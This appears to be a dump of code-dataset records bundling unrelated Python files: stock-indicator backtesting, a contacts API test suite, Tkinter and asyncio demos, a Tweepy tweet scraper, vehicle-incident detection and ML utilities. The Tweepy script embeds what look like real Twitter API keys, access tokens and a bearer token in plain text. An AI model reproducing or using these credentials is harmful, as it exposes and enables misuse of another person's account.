StockRSI(name, period)\r\n self.get_macd()\r\n self.implement_macd_strategy()\r\n\r\n def get_macd(self):\r\n self.hist['ema_fast'] = self.stock.get_ema(self.fast, self.hist['Close'])\r\n self.hist['ema_slow'] = self.stock.get_ema(self.slow, self.hist['Close'])\r\n\r\n self.hist['macd'] = self.hist['ema_fast'] - self.hist['ema_slow']\r\n self.hist['signal'] = self.hist['macd'].ewm(span=self.smooth, adjust=False).mean()\r\n self.hist['histo'] = self.hist['macd'] - self.hist['signal']\r\n return\t\r\n\r\n \r\n # def plot(self):\r\n # # self.get_macd()\r\n # self.hist['macd'][-100:].plot()\r\n # self.hist['signal'][-100:].plot()\r\n # plt.legend()\r\n # plt.show()\r\n\r\n def implement_macd_strategy(self): \r\n self.buy_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.sell_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.macd_flag = np.zeros(self.hist['Close'].shape)\r\n self.position = np.zeros(self.hist['Close'].shape)\r\n flag = 0\r\n\r\n for i in range(len(self.hist['macd'])):\r\n if self.hist['macd'][i] > self.hist['signal'][i]:\r\n if flag != 1:\r\n self.buy_price[i] = self.hist['Close'][i]\r\n flag = 1\r\n self.macd_flag[i] = flag\r\n elif self.hist['macd'][i] < self.hist['signal'][i]:\r\n if flag != -1:\r\n self.sell_price[i] = self.hist['Close'][i]\r\n flag = -1\r\n self.macd_flag[i] = flag\r\n\r\n ## Get Positions\r\n for i in range(self.position.shape[0]):\r\n if self.macd_flag[i] == 1:\r\n self.position[i] = 1\r\n elif self.macd_flag[i] == -1:\r\n self.position[i] = 0\r\n else:\r\n self.position[i] = self.position[i-1] \r\n\r\n self.position_change = np.diff(self.position, prepend=self.position[0])\r\n self.decision = np.where(self.position_change>0, 'buy', \r\n np.where(self.position_change<0, 'sell',\r\n 'hold')) \r\n return \r\n\r\n def plot(self, num=100, buy_price=None, sell_price=None, flag=False):\r\n plt.figure(figsize=(12,8))\r\n ax1 = plt.subplot2grid((10,1), (0,0), rowspan = 5, colspan = 1)\r\n ax2 = plt.subplot2grid((10,1), (5,0), rowspan = 3, colspan = 1)\r\n\r\n ax1.plot(self.hist['Close'][-num:])\r\n if flag == True:\r\n ax1.plot(self.hist['Close'].index[-num:], buy_price[-num:], marker = '^', color = 'green', \r\n markersize = 10, label = 'BUY SIGNAL', linewidth = 0)\r\n ax1.plot(self.hist['Close'].index[-num:], sell_price[-num:], marker = 'v', color = 'r', \r\n markersize = 10, label = 'SELL SIGNAL', linewidth = 0)\r\n ax1.legend()\r\n\r\n ax1.set_title(self.name, fontsize=25.0, color='b')\r\n ax1.text(0.2, 0.8, 'RSI = {}'.format(int(self.stock_rsi.rsi_df['RSI'].iloc[-1])), \r\n fontsize=20.0, transform=ax1.transAxes)\r\n\r\n ax2.plot(self.hist['macd'][-num:], color = 'grey', linewidth = 1.5, label = 'MACD')\r\n ax2.plot(self.hist['signal'][-num:], color = 'skyblue', linewidth = 1.5, label = 'SIGNAL')\r\n\r\n start = len(self.hist['Close']) - num\r\n for i in range(start, len(self.hist['Close'])):\r\n if str(self.hist['histo'][i])[0] == '-':\r\n ax2.bar(self.hist['Close'].index[i], self.hist['histo'][i], color = '#ef5350')\r\n else:\r\n ax2.bar(self.hist['Close'].index[i], self.hist['histo'][i], color = '#26a69a')\r\n\r\n plt.legend()\r\n plt.show()\r\n\r\n def get_returns(self, invest_val=100000):\r\n num_stocks = math.floor(invest_val/self.hist['Close'][0])\r\n\r\n self.hist['daily_return'] = self.hist['Close'].diff().fillna(0)\r\n self.hist['macd_return'] = self.hist['daily_return'].shift(-1).fillna(0) * self.position\r\n\r\n total_return = np.sum((self.hist['macd_return']*num_stocks).values)\r\n percnt_return = (total_return/invest_val)*100\r\n print('\\nGains from the MACD strategy: {}, with %: {} \\n'.format(total_return, percnt_return))\r\n\r\n return total_return, num_stocks, percnt_return\r\n\r\n\r\n\r\nclass BollingerBands():\r\n def __init__(self, name, period, window, nb_stddev=2):\r\n self.name = name\r\n self.period = period\r\n self.window = window\r\n self.nb_stddev = nb_stddev\r\n self.stock = StockInfo(name, period)\r\n self.hist = self.stock.hist\r\n self.get_bb()\r\n self.implement_strategy()\r\n\r\n def get_bb(self):\r\n std = self.hist['Close'].rolling(self.window).std()\r\n self.hist['middle_bb'] = self.hist['Close'].rolling(self.window).mean()\r\n self.hist['upper_bb'] = self.hist['middle_bb'] + std * self.nb_stddev\r\n self.hist['lower_bb'] = self.hist['middle_bb'] - std * self.nb_stddev\r\n return \r\n\r\n def implement_strategy(self): \r\n trace = self.hist['Close']\r\n buy_limit = self.hist['lower_bb']\r\n sell_limit = self.hist['upper_bb']\r\n self.buy_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.sell_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.bb_flag = np.zeros(self.hist['Close'].shape)\r\n self.position = np.zeros(self.hist['Close'].shape)\r\n flag = 0\r\n\r\n for i in range(len(self.hist['upper_bb'])):\r\n if trace[i] < buy_limit[i]:\r\n # if flag != 1:\r\n self.buy_price[i] = self.hist['Close'][i]\r\n flag = 1\r\n self.bb_flag[i] = flag\r\n elif trace[i] > sell_limit[i]:\r\n # if flag != -1:\r\n self.sell_price[i] = self.hist['Close'][i]\r\n flag = -1\r\n self.bb_flag[i] = flag\r\n\r\n ## Get Positions\r\n for i in range(self.position.shape[0]):\r\n if self.bb_flag[i] == 1:\r\n self.position[i] = 1\r\n elif self.bb_flag[i] == -1:\r\n self.position[i] = 0\r\n else:\r\n self.position[i] = self.position[i-1] \r\n\r\n self.position_change = np.diff(self.position, prepend=self.position[0])\r\n self.decision = np.where(self.position_change>0, 'buy', \r\n np.where(self.position_change<0, 'sell',\r\n 'hold'))\r\n return\r\n\r\n def plot(self, num=100, buy_price=None, sell_price=None, flag=True):\r\n plt.figure(figsize=(12,8))\r\n ax1 = plt.subplot2grid((10,1), (0,0), rowspan = 5, colspan = 1)\r\n\r\n ax1.plot(self.hist['Close'][-num:])\r\n ax1.plot(self.hist['middle_bb'][-num:], linewidth=0.5, color='m', linestyle='dashed', dashes=(10, 10))\r\n ax1.plot(self.hist['upper_bb'][-num:], linewidth=0.5, color='m')\r\n ax1.plot(self.hist['lower_bb'][-num:], linewidth=0.5, color='m')\r\n if flag == True:\r\n ax1.plot(self.hist['Close'].index[-num:], self.buy_price[-num:], marker = '^', color = 'green', \r\n markersize = 10, label = 'BUY SIGNAL', linewidth = 0)\r\n ax1.plot(self.hist['Close'].index[-num:], self.sell_price[-num:], marker = 'v', color = 'r', \r\n markersize = 10, label = 'SELL SIGNAL', linewidth = 0)\r\n ax1.legend()\r\n\r\n ax1.set_title(self.name, fontsize=25.0, color='b')\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n def get_returns(self, invest_val=100000):\r\n num_stocks = math.floor(invest_val/self.hist['Close'][0])\r\n\r\n self.hist['daily_return'] = self.hist['Close'].diff().fillna(0)\r\n self.hist['bb_return'] = self.hist['daily_return'].shift(-1).fillna(0) * self.position\r\n\r\n total_return = np.sum((self.hist['bb_return']*num_stocks).values)\r\n percnt_return = (total_return/invest_val)*100\r\n print('\\nGains from the BB strategy: {}, with %: {} \\n'.format(total_return, percnt_return))\r\n\r\n return total_return, num_stocks, percnt_return\r\n\r\n\r\n####-------------------\r\n\r\ndef get_decision(dict1, timeframe=5):\r\n decision_df = pd.DataFrame(dict1)\r\n ## Selecting shares which have Buy or Sell call\r\n decision_df = decision_df.loc[:, (decision_df != 'hold').any(axis=0)]\r\n decision_df.index = ['day -{}'.format(t) for t in range(timeframe, 0, -1)]\r\n return decision_df\r\n\t\r\ndef color_func(val):\r\n color = 'green' if val == 'buy' else 'red' if val == 'sell' else 'yellow'\r\n return 'background-color: {}'.format(color)\t\r\n\r\ndef plot_returns(dict1, dict2, label1='macd', label2='buy_hold'):\r\n plt.figure(figsize=(12,6))\r\n x1, y1 = zip(*list(dict1.items()))\r\n plt.plot(x1, y1, '.-', label=label1)\r\n x2, y2 = zip(*list(dict2.items()))\r\n plt.plot(x2, y2, '.-', label=label2)\r\n plt.xticks(rotation=90)\r\n plt.legend()\r\n plt.grid(visible=True)\r\n plt.ylabel('Percentage Returns %', fontdict={'size':16})\r\n plt.show()\r\n return\r\n\r\n###============ \r\n\r\n# period = '2y'\r\n\r\n# # stock_rsi = StockRSI('AFFLE.NS', period)\r\n# # stock_rsi.get_RSI(stock_rsi.hist['Close'])\r\n# # stock_rsi.plot_RSI()\r\n\r\n# stock = StockInfo('AFFLE.NS', period)\r\n# stock.buy_hold_returns()\r\n# # stock.plot(stock.hist['Close'])\r\n\r\n# macd = MACD('AFFLE.NS', period, 12, 26, 9)\r\n# macd.plot()\r\n# macd.get_returns()\r\n","repo_name":"gauravsa123/stocks","sub_path":"macd_functions.py","file_name":"macd_functions.py","file_ext":"py","file_size_in_byte":12626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"38825845035","text":"def get_winner(*point_of_gamers):\n board_of_gamers = []\n for index, gamers in enumerate(points_of_gamers):\n list_of_gamers = gamers, index+1\n board_of_gamers.append(list_of_gamers)\n sort_gamers = sorted(board_of_gamers, reverse=True)\n winners = sort_gamers[0:3]\n number_of_winner = [number_of_winner[1] for number_of_winner in winners]\n return number_of_winner\n\n\npoints_of_gamers = [599, 67, 94, 87, 6, 44]\n# Вариант если очки игроков вводить с консоли\n# points_of_gamers = list(map(int, input('Введите очки\\\n# игроков от 0 до 600 через пробел\\\n# и нажмите Enter ').split(' ')))\nwinners = get_winner(points_of_gamers)\nprint(f'Номера победителей {winners}')\n","repo_name":"NikitaMogilev/homeworks","sub_path":"homework7/task_7_1.py","file_name":"task_7_1.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39897256451","text":"import unittest\nimport requests\n\nclass TestContactsAPI(unittest.TestCase):\n\n def setUp(self):\n # Configurar a URL base da API\n self.base_url = \"http://localhost:5000\"\n # Dados do contato de exemplo para testes\n self.data = {\n \"nome\": \"João\",\n \"sobrenome\": \"Silva\",\n \"email\": \"joao@example.com\",\n \"telefone\": \"(11) 98765-4321\"\n }\n\n def test_create_contact(self):\n # Testar a criação de um novo contato\n # Remova o campo \"id\" dos dados do contato antes de enviar a requisição\n self.data.pop(\"id\", None)\n response = requests.post(f\"{self.base_url}/contatos\", json=self.data)\n self.assertEqual(response.status_code, 201)\n self.assertIn(\"id\", response.json())\n\n\n def test_read_contact(self):\n # Testar a leitura de um contato pelo ID\n response = requests.get(f\"{self.base_url}/contatos/1\")\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"nome\"], \"João da Silva\")\n\n def test_update_contact(self):\n # Testar a atualização de um contato pelo ID\n data = {\n \"nome\": \"João da Silva\",\n \"email\": \"joao.silva@example.com\"\n }\n response = requests.put(f\"{self.base_url}/contatos/1\", json=data)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"message\"], \"Contato atualizado com sucesso\")\n\n def test_delete_contact(self):\n # Testar a exclusão de um contato pelo ID\n response = requests.delete(f\"{self.base_url}/contatos/1\")\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"message\"], \"Contato excluído com sucesso\")\n\n def test_search_contact(self):\n # Testar a pesquisa de contatos por parte do nome\n search_name = \"Jo\"\n response = requests.get(f\"{self.base_url}/contatos/search?nome={search_name}\")\n self.assertEqual(response.status_code, 200)\n self.assertIsInstance(response.json(), list)\n self.assertTrue(len(response.json()) > 0)\n\nclass OrderedTestLoader(unittest.TestLoader):\n def getTestCaseNames(self, testCaseClass):\n test_names = super().getTestCaseNames(testCaseClass)\n ordered_test_names = [\n \"test_create_contact\",\n \"test_read_contact\",\n \"test_update_contact\",\n \"test_search_contact\",\n \"test_delete_contact\",\n ]\n return sorted(test_names, key=lambda x: ordered_test_names.index(x))\n\nif __name__ == '__main__':\n unittest.main(testLoader=OrderedTestLoader())\n","repo_name":"MykleBR/API2.0","sub_path":"TEST/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28994363568","text":"#Tutorial Walkthrough with YouTube's Sentdex\n\n#{Videos Complete:\n#1\n\n\n\n\n#{Link: https://pythonprogramming.net/object-oriented-programming-crash-course-tkinter/?completed=/tkinter-depth-tutorial-making-actual-program/}\n\n\n\nimport tkinter as tk \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#{NOTE: What is OOP?>Object Oriented Program uses Instances of Objects sometimes generated from Class templates.}\nclass SeaofBTCapp(tk.Tk): \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#{Inheritance goes here. Other Classes}\t\n\tdef __init__(self, *args, **kwargs):\t\t\t\t\t\t\t\t\t\t\t#{*args = Short for Arguments, can pass any number of variables.; *qwargs = Usually for dictionaries. 99.9999999999999% of the time. } \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#We did not rename tk.Tk as Root, subsequently root does not equal r. Change later?\n\n\t\ttk.Tk.__init__(self, *args, **kwargs)\t\t\t\t\t\t\t\t\t\t\t#{always use a container to populate.}\n\t\tcontainer = tk.Frame(self)\n\n\t\tcontainer.pack(side=\"top\",fill=\"both\",expand=True)\n\n\t\tcontainer.grid_rowconfigure(0, weight=1)\t\t\t\t\t\t\t\t\t\t#Weight = Priority\n\t\tcontainer.grid_columnconfigure(0, weight=1)\n\t\tself.frames = {}\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n\n\t\tframe = StartPage(container, self)\n\n\t\tself.frames[StartPage] = Frame\n\n\t\tframe.grid(row=0,column=0,sticky=\"nsew\")\n\n\n\n","repo_name":"CodyLRobertson/TUTORIAL_Tkinter_sentdex","sub_path":"Sentdex_Tkinter_python_walkthrough.py","file_name":"Sentdex_Tkinter_python_walkthrough.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27220905833","text":"from time import sleep\nimport asyncio\n\nasync def very_long_running_task():\n\tprint(f'very_long_running_task started...')\n\tawait asyncio.sleep(3)\n\tprint(f'very_long_running_task finished!')\n\nasync def normal_task():\n\tprint(f'normal_task started...')\n\tawait asyncio.sleep(2)\n\tprint(f'normal_task finished!')\n\nasync def flash_task():\n\tprint(f'flash_task started...')\n\tawait asyncio.sleep(1)\n\tprint(f'flash_task finished!')\n\nasync def runner():\n\ttask_list = [very_long_running_task]*3 + [normal_task]*3 + [flash_task]*3\n\ttask_list = [asyncio.create_task(task(), name=f'{task.__name__}') for task in task_list]\n\tdone, pending = await asyncio.wait(task_list, return_when=asyncio.FIRST_COMPLETED)\n\tfor task in pending:\n\t\tprint(task)\n\t\ttask.cancel()\n\n\nasyncio.run(runner())","repo_name":"dremdem/gcaw","sub_path":"test_real_async.py","file_name":"test_real_async.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11133567963","text":"#Lab 2\n#1-\tConnect to Twitter account and Extract first 100 tweets from it in a file\n\nimport tweepy\nimport pandas as pd\nimport csv\nimport re\nimport string\nimport preprocessor as p\n\nconsumer_key = \"QvPhWYeUMHVcFtM4UjFk7gdrm\"\nconsumer_secret = \"XP0b3lT8FyX0drEYeb6qGiZbUfzXmfNcuHN34qgRWf2XZbsWhT\"\naccess_key = \"858886404591333376-5PUlvH7SIRkKXyWOQDdWLnPXQdR6vZC\"\naccess_secret = \"atBJYZ5jU3Ka8LeKwp7Df6VQQOFGtO0djAokxHoTUZmfj\"\nbearer_key=\"AAAAAAAAAAAAAAAAAAAAAICPlQEAAAAAFkHSzq2jnwMEpf8wmoNUDgKM%2Fzg%3De4kQBj97JAvkFeLsVoix7h6s8HVfQxRJtPduZ1gBF4lE4isUTm\"\n\n\n\n#make a connection with API v2\nimport requests\n\nclient = tweepy.Client( bearer_token=bearer_key,\n consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token=access_key,\n access_token_secret=access_secret,\n return_type = requests.Response,\n wait_on_rate_limit=True)\n\n\n#Defining a query\nquery = 'from:joonsquotes -is:retweet'\n# retweets and limit of tweets to 100\n\n# get max. 100 tweets\ntweets = client.search_recent_tweets(query=query,tweet_fields=['author_id', 'created_at'],max_results=100)\n\n#conversion to pandas dataframe\nimport pandas as pd\n\n# Save data as dictionary\ntweets_dict = tweets.json()\n\n# Extract \"data\" value from dictionary\ntweets_data = tweets_dict['data']\n\n# Transform to pandas Dataframe\ndf = pd.json_normalize(tweets_data)\n\nprint(df)\n\n#save\ndf.to_csv(\"namjoon_lyrics_tweets.csv\")","repo_name":"Himm11/NLPbasic","sub_path":"Lab_2.py","file_name":"Lab_2.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8393681754","text":"import pandas as pd\r\nimport time\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nimport os\r\nimport json\r\n\r\nroot = tk.Tk()\r\nroot.withdraw()\r\nfolder_path = filedialog.askdirectory()\r\nsubfolders = os.listdir(folder_path)\r\nprint('\\nProcessing...\\n')\r\nt1 = time.time()\r\n#--------------------------------------------------------------------------------------------------------\r\nt1 = -1.6\r\nt2 = 180\r\nA = 12.5\r\ndef condition1(df,t1,t2):\r\n try:\r\n df2 = df[(df['linear_acceleration.x_filtered'] < t1) & (df['msg.brake'] > t2)]\r\n # print(df)\r\n stamp = []\r\n loc1 = []\r\n t_list = list(df2['Time'])\r\n if t_list != []:\r\n stamp.append(t_list[0])\r\n for i in range(len(t_list)):\r\n if i == len(t_list)-1:\r\n break\r\n if t_list[i+1]- t_list[i] > 5:\r\n stamp.append(t_list[i+1])\r\n print('stamp1: ',stamp)\r\n loc1 = df.index[df['Time'].isin(stamp)].tolist()\r\n print('loc1: ', loc1)\r\n df.loc[loc1,'incident_flag'] = 1\r\n else:\r\n pass\r\n except KeyError as e:\r\n print(e)\r\n stamp = []\r\n loc1 = []\r\n return stamp, loc1\r\n#--------------------------------------------------------------------------------------------------------\r\ndef condition2(df,subfolder,A):\r\n try:\r\n # map = pd.read_csv(os.path.join(folder_path, subfolder + r\"/waypoints_map.csv\"), index_col=0)\r\n subfolder = subfolder.replace('-','')\r\n subfolder = subfolder.replace('Chula','CU')\r\n vehicle,operator,location,date = subfolder.split('_')\r\n with open(f'D:\\FOOH\\Senior_Project\\map\\waypoint_{vehicle}_{location}.csv') as f:\r\n map = pd.read_csv(f)\r\n # map = map[map['event_flag'] != 0]\r\n x = list(map['x'])\r\n y = list(map['y'])\r\n\r\n df['in_station'] = 0\r\n shift_msg = df['msg.mode'].shift(periods=1)\r\n df2 = df[df['msg.mode'] != shift_msg]\r\n df2 = df2.iloc[1:]\r\n\r\n # A = 5 # bus stop area\r\n for i in range(len(x)):\r\n df2.loc[(abs((df2['pose.position.x']-x[i])) < A) & (abs((df2['pose.position.y']-y[i])) < A),'in_station'] = 1\r\n # print(df)\r\n stamp = df2[df2['in_station'] == 0]['Time']\r\n stamp = list(stamp)\r\n print('stamp2:', stamp)\r\n loc2 = df2.index[df2['in_station'] == 0].tolist()\r\n print('loc2: ', loc2)\r\n df.loc[loc2,'incident_flag'] = 1\r\n # remove mode switch at the start\r\n try:\r\n x0 = df['pose.position.x'].iat[0]\r\n y0 = df['pose.position.y'].iat[0]\r\n x1 = df['pose.position.x'].iat[loc2[0]]\r\n y1 = df['pose.position.y'].iat[loc2[0]]\r\n if abs(x1-x0) < A and abs(y1-y0) < A:\r\n stamp.pop(0)\r\n loc2.pop(0)\r\n except:\r\n pass\r\n except (FileNotFoundError, KeyError) as e:\r\n print(e)\r\n stamp = []\r\n loc2 = []\r\n return stamp, loc2\r\n#--------------------------------------------------------------------------------------------------------\r\nstamp_dict = {}\r\nfor subfolder in subfolders:\r\n try:\r\n df = pd.read_csv(os.path.join(folder_path, subfolder + r\"/merged_filtered_df.csv\"), index_col=0)\r\n print(subfolder)\r\n df['incident_flag'] = 0\r\n stamp1,loc1 = condition1(df,t1,t2)\r\n stamp2,loc2 = condition2(df,subfolder,A)\r\n stamp_dict[subfolder] = {}\r\n stamp_dict[subfolder]['Condition1'] = stamp1\r\n stamp_dict[subfolder]['Condition2'] = stamp2\r\n stamp_dict[subfolder]['loc1'] = loc1\r\n stamp_dict[subfolder]['loc2'] = loc2\r\n if 'in_station' in list(df.columns):\r\n df = df.drop(columns = 'in_station')\r\n df.to_csv(os.path.join(folder_path, subfolder + r\"/merged_filtered_df.csv\"))\r\n print('------ DONE ------\\n')\r\n except FileNotFoundError as e:\r\n print(subfolder, e, '\\n*Skip\\n')\r\n \r\nprint(stamp_dict)\r\nwith open(f\"Incidents_t1[{t1}]_t2[{t2}]_A[{A}].json\", \"w\") as f: \r\n jsonString = json.dumps(stamp_dict, indent=4)\r\n f.write(jsonString)\r\n \r\nprint('\\n'+ '***'*10**2 + '\\n')\r\n\r\n","repo_name":"kopkap345/streamlit_test","sub_path":"Condition1-2.py","file_name":"Condition1-2.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22269850540","text":"import os\nfrom os import path\nimport random\nimport argparse\n\nfrom misc import module_utils\nfrom config import template\n\nimport torch\nimport numpy as np\n\n\ndef parse():\n default_parse = [\n 'default_general',\n 'default_data',\n 'default_model',\n 'default_loss',\n 'default_trainer',\n 'default_optimizer',\n 'default_log',\n 'default_gans',\n 'sr_model',\n 'cfg_srwarp',\n ]\n parser = argparse.ArgumentParser()\n for option in default_parse:\n group = parser.add_argument_group(option)\n m = module_utils.load_with_exception(option, 'config')\n m.add_argument(group)\n\n cfg = parser.parse_args()\n template.set_template(cfg.template, cfg)\n\n if cfg.override is not None:\n # --args1 [value1] -args2 [value2] ...\n args = cfg.override.split('--')[1:]\n for kv in args:\n kv_split = kv.split(' ')\n k = kv_split[0]\n v = kv_split[1]\n if v.isdecimal():\n v = int(v)\n elif v.lower() == 'true':\n v = True\n elif v.lower() == 'false':\n v = False\n\n print('{}: {} is overrided to {}'.format(k, getattr(cfg, k), v))\n setattr(cfg, k, v)\n\n # Resume from the latest checkpoint\n if cfg.resume == 'self':\n cfg.resume = path.join('..', 'experiment', cfg.save, 'latest.ckpt')\n cfg.reset = False\n\n if cfg.seed == -1:\n cfg.seed = random.randint(0, 2**31 - 1)\n\n split = cfg.save.split(os.sep)\n if len(split) == 2:\n cfg.save, cfg.ablation = split\n\n random.seed(cfg.seed)\n np.random.seed(cfg.seed)\n torch.manual_seed(cfg.seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(cfg.seed)\n\n if cfg.linear > 1:\n cfg.batch_size *= cfg.linear\n cfg.lr *= cfg.linear\n cfg.print_every = max(cfg.print_every // cfg.linear, 1)\n cfg.test_every = max(cfg.test_every // cfg.linear, 1)\n\n return cfg\n\ndef parse_namespace(cfg, *args):\n '''\n Get *args from cfg.\n\n Args:\n cfg (napespace): Target namespace.\n *args (list of str): Argument names to be parsed.\n\n Example::\n >>> parse_namespace(test, 'a', 'b', 'c')\n >>> {'a': cfg.a, 'b': cfg.b, 'c': cfg.c}\n '''\n ret = {}\n for arg in args:\n if hasattr(cfg, arg):\n ret[arg] = getattr(cfg, arg)\n\n return ret\n\n","repo_name":"sanghyun-son/srwarp","sub_path":"src/config/get_config.py","file_name":"get_config.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"83"} +{"seq_id":"3063261303","text":"import torch\n\nfrom speechbrain.nnet.losses import length_to_mask\n\n\ndef undo_padding_tensor(batch, lengths):\n \"\"\"\n A tensor version of undo_padding. Return a list of tensors, instead of a list of lists.\n\n Parameters\n ----------\n batch : torch.Tensor\n (B, T, *)\n lengths : torch.Tensor\n (B)\n\n Returns\n -------\n as_list : list\n A list of unpadded tensors.\n\n \"\"\"\n batch_max_len = batch.shape[1]\n as_list = []\n for seq, seq_length in zip(batch, lengths):\n actual_size = int(torch.round(seq_length * batch_max_len))\n seq_true = seq.narrow(0, 0, actual_size)\n as_list.append(seq_true)\n return as_list\n\n\ndef apply_weight(x, weight):\n \"\"\"\n Apply weight using torch.bmm\n\n Parameters\n ----------\n x : torch.tensor\n (B, T, N, C) or (B, T, N * C)\n weight : torch.tensor\n (B, T, N)\n\n Returns\n -------\n weighted_x : torch.tensor\n (B, T, C)\n \"\"\"\n B, T, N = weight.shape\n C = x.shape[-1]\n if x.ndim == 3:\n C = C // N\n x = x.view(B, T, N, C)\n\n # reshape tensors\n x = x.view(B * T, N, C)\n weight = weight.view(B * T, 1, N)\n\n # apply weight\n weighted_x = torch.bmm(weight, x)\n\n # reshape weighted x\n weighted_x = weighted_x.view(B, T, C)\n\n return weighted_x\n\n\ndef apply_lens_to_loss(loss, lens, reduction='mean'):\n \"\"\"\n Compute the mean loss of a batch while considering the lengths of each sample.\n\n Parameters\n ----------\n loss : torch.tensor\n (B, T, C)\n lens : torch.Tensor\n (B)\n reduction : str\n 'mean', 'batchmean' or 'batch'\n\n Returns\n -------\n loss : torch.tensor\n Single value. Mean loss.\n \"\"\"\n # compute and apply mask\n mask = torch.ones_like(loss)\n length_mask = length_to_mask(lens * mask.shape[1], max_len=mask.shape[1])\n length_mask = length_mask.type(mask.dtype)\n # handle any dimensionality of input\n while len(length_mask.shape) < len(mask.shape):\n length_mask = length_mask.unsqueeze(-1)\n mask *= length_mask\n\n # compute loss\n loss = loss * mask\n B = loss.size(0)\n if reduction == 'mean':\n loss = loss.sum() / torch.sum(mask)\n elif reduction == 'batchmean':\n loss = loss.sum() / B\n elif reduction == 'batch':\n loss = loss.reshape(B, -1).sum(dim=-1) / mask.reshape(B, -1).sum(dim=-1)\n\n return loss\n\n\ndef resample_tensor(source, target, dim):\n \"\"\"\n Resample the time dimension of source tensor to match target tensor.\n\n Parameters\n ----------\n source : torch.Tensor\n The tensor to be resampled.\n target : torch.Tensor\n The target tensor.\n dim : int\n The time dimension.\n\n Returns\n -------\n resampled_source: torch.Tensor\n (B, T, *)\n \"\"\"\n source_shape = source.shape\n source_ind = [slice(None) for _ in source_shape]\n\n source_T = source.shape[dim]\n target_T = target.shape[dim]\n\n factor = round(target_T // source_T)\n if not factor > 0:\n raise ValueError(f'non-positive factor for input lengths: {source_T} and {target_T}')\n\n # repeat the values in source tensor\n resampled_source = torch.repeat_interleave(source, factor, dim=dim)\n\n # check shape difference\n shape_diff = resampled_source.shape[dim] - target_T\n diff_tol = 3\n if not -diff_tol <= shape_diff <= diff_tol:\n raise ValueError(f'length difference between resampled tensor and target tensor is too large: {shape_diff}')\n\n if shape_diff > 0: # remove extra values from resampled tensor\n source_ind[dim] = slice(target_T)\n resampled_source = resampled_source[source_ind]\n elif shape_diff < 0: # pad resampled tensor with zeros\n zeros = torch.zeros_like(resampled_source)\n resampled_ind = [slice(None) for _ in resampled_source.shape]\n resampled_ind[dim] = slice(-shape_diff)\n zeros = zeros[resampled_ind]\n resampled_source = torch.cat([resampled_source, zeros], dim=dim)\n\n assert resampled_source.shape[dim] == target_T\n\n return resampled_source\n\n\ndef boundary_seq_to_seg_seq(boundary_seq):\n \"\"\"\n Convert boundary sequence into segmentation sequence.\n\n Parameters\n ----------\n boundary_seq : torch.Tensor\n Boundary sequence.\n\n Returns\n -------\n seg_seq : torch.Tensor\n Segmentation sequence.\n\n \"\"\"\n boundary_index_seq = torch.where(boundary_seq == 1)[0]\n # boundary_index_seq = torch.cat([boundary_index_seq, torch.tensor(len(boundary_seq))])\n seg_seq = []\n for i in range(len(boundary_index_seq) - 1):\n seg_seq.append([boundary_index_seq[i], boundary_index_seq[i + 1]])\n seg_seq.append([boundary_index_seq[-1], len(boundary_index_seq)])\n\n return torch.tensor(seg_seq)\n\n\ndef compute_categorical_ll(dist, sampled):\n \"\"\"\n Compute the log-likelihood for a categorical distribution.\n\n Parameters\n ----------\n dist : torch.distributions.Categorical\n The categorical distribution.\n\n sampled : torch.Tensor\n Sampled data.\n\n Returns\n -------\n ll : torch.Tensor\n Log-likelihood.\n \"\"\"\n logits = dist.logits\n if logits.shape != sampled.shape:\n raise ValueError(f'inconsistent shapes: {logits.shape} != {sampled.shape}')\n\n ll = torch.bmm(logits.reshape(logits.shape[0] * logits.shape[1], 1, -1),\n sampled.reshape(logits.shape[0] * logits.shape[1], -1, 1)).reshape(logits.shape[0], logits.shape[1])\n\n return ll","repo_name":"weiwei-ww/ML-VAE","sub_path":"src/utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"21446438691","text":"import phenotypes_pb2\nimport sys\nimport polycubes\nimport os\n\ndef checkSettings(a, b):\n msg = 'Incompatible datasets'\n assert len(set(d.nColors for d in [a, b])) == 1, msg\n assert len(set(d.nCubeTypes for d in [a, b])) == 1, msg\n assert len(set(d.nDimensions for d in [a, b])) == 1, msg\n assert len(set(d.assemblyMode for d in [a, b])) == 1, msg\n\ndef readDatasets(paths):\n dataset = phenotypes_pb2.Dataset()\n for i, path in enumerate(paths):\n tmp = phenotypes_pb2.Dataset()\n with open(path, \"rb\") as f:\n tmp.ParseFromString(f.read())\n if i>0:\n checkSettings(dataset, tmp)\n dataset.MergeFrom(tmp)\n return dataset\n\ndef merge(outdir):\n files = []\n for r, _, fs in os.walk(outdir):\n files = [f for f in fs if 